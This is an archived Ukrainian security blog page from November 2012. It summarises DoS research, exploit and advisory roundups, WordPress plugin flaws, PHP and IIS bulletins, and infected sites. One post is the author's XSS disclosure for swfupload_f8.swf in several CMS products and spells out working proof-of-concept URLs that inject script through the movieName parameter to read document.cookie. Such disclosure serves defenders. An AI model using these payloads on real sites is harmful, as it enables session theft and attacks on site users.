Архів за Листопад, 2012

Ефективні Denial of Service атаки проти веб додатків

22:46 21.11.2012

Продовжуючи розпочату традицію, після попереднього відео про Denial of Service в Internet Explorer, пропоную нове відео на веб секюріті тематику. Цього разу відео про ефективні Denial of Service атаки проти веб додатків. Рекомендую подивитися всім хто цікавиться цією темою.

28c3: Effective Denial of Service attacks against web application platforms

Наприкінці минулого року на конференції 28c3 був оприлюднений алгоритм проведення Denial of Service атак на різні мови програмування для веб та веб платформи - DoS через хеш таблиці. Зокрема в PHP дана уразливість була виправлена в PHP 5.3.9.

В ролику показаний виступ Alexander Klink і Julian Walde на конференції, де вони презентують даний метод DoS атак. Який вони розробили базуючись на статті “Denial of Service via Algorithmic Complexity Attacks” 2003 року, написаної Scott A. Crosby і Dan S. Wallach. В тому ж році дана уразливість була виправлена в Perl.

Атака відбувається при відправленні великої кількості аргументів веб додатку, що призводить до перевантаження сервера. Рекомендую подивитися дане відео для розуміння векторів атак на веб додатки і веб сервера.

Добірка експлоітів

17:20 21.11.2012

В даній добірці експлоіти в веб додатках:

  • Narcissus Image Configuration Passthru Vulnerability (деталі)
  • NFR Agent FSFUI Record File Upload Remote Command Execution (деталі)
  • Media Player Classic XSS / Denial Of Service (деталі)
  • BigAnt Server 2.52 Stack Overflow Vulnerability (деталі)
  • Internet Explorer 9 Memory Corruption PoC Exploit (деталі)

Уразливості в плагінах для WordPress №78

23:57 20.11.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах AJAX post Search, FoxyPress та Spider WordPress. Для котрих з’явилися експлоіти. AJAX post Search - це пошуковий плагін, FoxyPress - це e-commerce плагін для створення онлайн-магазина, Spider WordPress - це плагін для створення каталогу продуктів.

  • Sql injection in AJAX post Search wordpress plugin (деталі)
  • WordPress FoxyPress 0.4.2.5 XSS / CSRF / SQL Injection (деталі)
  • WordPress Catalog HTML Injection / Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Проблеми безпеки PHP

22:46 20.11.2012

В статті PHP - старая песня о главном розповідається про проблеми безпеки PHP. Зокрема йдеться про критичну уразливість, що дозволяла відправку довільних команд PHP інтерпретатору, яка наробила багато шуму цього року.

В даній статті розглянуті наступні аспекти цієї уразливості в PHP:

  • Зворотна сторона PHP
  • Як це було
  • Анатомія уразливості
  • Експлоіти
  • Blackbox? Nope!
  • RCE власною персоною
  • Не інпутом єдиним
  • Патчений патч

Дана уразливість в інтерпретаторі PHP наочно показує, що проблеми з безпекою мають місце не тільки у PHP-додатках, а й в самому інтерпретаторі. Причому серйозні проблеми (уразливості в PHP знаходиться регулярно, але іноді трапляються критичні дірки). Цього року було знайдено аж дві такі уразливості в PHP, що дозволяли віддалене виконання коду.

Уразливості в Microsoft Internet Information Services

20:05 20.11.2012

Виявлені уразливості безпеки в Microsoft Internet Information Services.

Уразливі версії: Microsoft IIS 7.0 і 7.5 для Windows Vista, Windows 2008 Server, Windows 7.

Витік інформації через лог-файли, впровадження команд у STARTTLS-сеанс FTP.

  • Microsoft Security Bulletin MS12-073 - Moderate Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure (2733829) (деталі)

Добірка уразливостей

17:23 20.11.2012

В даній добірці уразливості в веб додатках:

  • Cisco Application Control Engine Administrator IP Address Overlap Vulnerability (деталі)
  • XSS Vulnerabilities in ClipBucket (деталі)
  • VaM Shop Cross-Site Scripting and Blind SQL Injection Vulnerabilities (деталі)
  • Smf 2.0.2 Cross-Site Scripting Vulnerability (деталі)
  • McAfee SmartFilter Administration Server SFAdminSrv.exe JBoss RMI Remote Code Execution Vulnerabilty (деталі)
  • Inventory 1.0 Multiple SQL Vulnerabilities (деталі)
  • Inventory 1.0 Multiple XSS Vulnerabilities (деталі)
  • viewvc security update (деталі)
  • Vulnerability in apache-mod_auth_openid (деталі)
  • Layton Helpbox 4.4.0 Multiple Security Issues (деталі)

XSS уразливість в TinyMCE, SPIP, Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony

23:53 19.11.2012

Раніше я писав про XSS уразливість в AionWeb, ExpressionEngine, Liferay Portal, SurgeMail, symfony (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередніх записах я писав про веб додатки з swfupload.swf і swfupload_f9.swf (які призначені для Flash Player 10 та Flash Player 9), то зараз я напишу про веб додатки з swfupload_f8.swf, який призначений для Flash Player 8. Зокрема я виявив дану Cross-Site Scripting уразливість в Archiv plugin для TinyMCE, Squeeze Documents для SPIP, Upload Manager для Radiant CMS, AionWeb, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail та symfony - серед багатьох веб додатків, що постачаються з swfupload_f8.swf.

XSS:

Archiv plugin для TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Squeeze Documents для SPIP:

http://site/plugins_spip/squeeze_documents/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/plugins_spip/squeeze_documents/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Upload Manager для Radiant CMS:

http://site/public/swfupload/Flash8/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/public/swfupload/Flash9/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В AionWeb окрім swfupload.swf і swfupload_f9.swf, описаних раніше, також присутній і swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Liferay Portal окрім swfupload_f9.swf, описаному раніше, також присутній і swfupload_f8.swf.

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В SurgeMail окрім swfupload.swf і swfupload_f9.swf, описаних раніше, також присутній і swfupload_f8.swf.

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В symfony окрім swfupload_f9.swf, описаному раніше, також присутній і swfupload_f8.swf.

Уразливі потенційно всі версії Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Добірка експлоітів

22:42 19.11.2012

В даній добірці експлоіти в веб додатках:

  • Oracle Database Client System Analyzer Arbitrary File Upload (деталі)
  • Jira Scriptrunner 2.0.7 <= CSRF/RCE Exploit (деталі)
  • Java Applet JAX-WS Remote Code Execution Vulnerability (деталі)
  • EMC Networker Format String Vulnerability (деталі)
  • BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass) (деталі)

Інфіковані сайти №140

20:11 19.11.2012

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://mp3searcher.mk.ua - інфекція була виявлена 12.11.2012. Зараз сайт не входить до переліку підозрілих.
  • http://1dowladss.net.ua - інфекція була виявлена 14.11.2012. Зараз сайт входить до переліку підозрілих.
  • http://firstline.com.ua - інфекція була виявлена 18.11.2012. Зараз сайт не входить до переліку підозрілих.
  • http://theodosia.at.ua - інфекція була виявлена 04.09.2012. Зараз сайт входить до переліку підозрілих.
  • http://knopka.ck.ua - інфекція була виявлена 01.10.2012. Зараз сайт не входить до переліку підозрілих.

Численні уразливості в Microsoft Internet Explorer

17:05 19.11.2012

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 9 під Windows Vista, Windows 2008 Server, Windows 7.

Кілька помилок використання пам’яті після звільнення.

  • Microsoft Security Bulletin MS12-071 - Critical Cumulative Security Update for Internet Explorer (2761451) (деталі)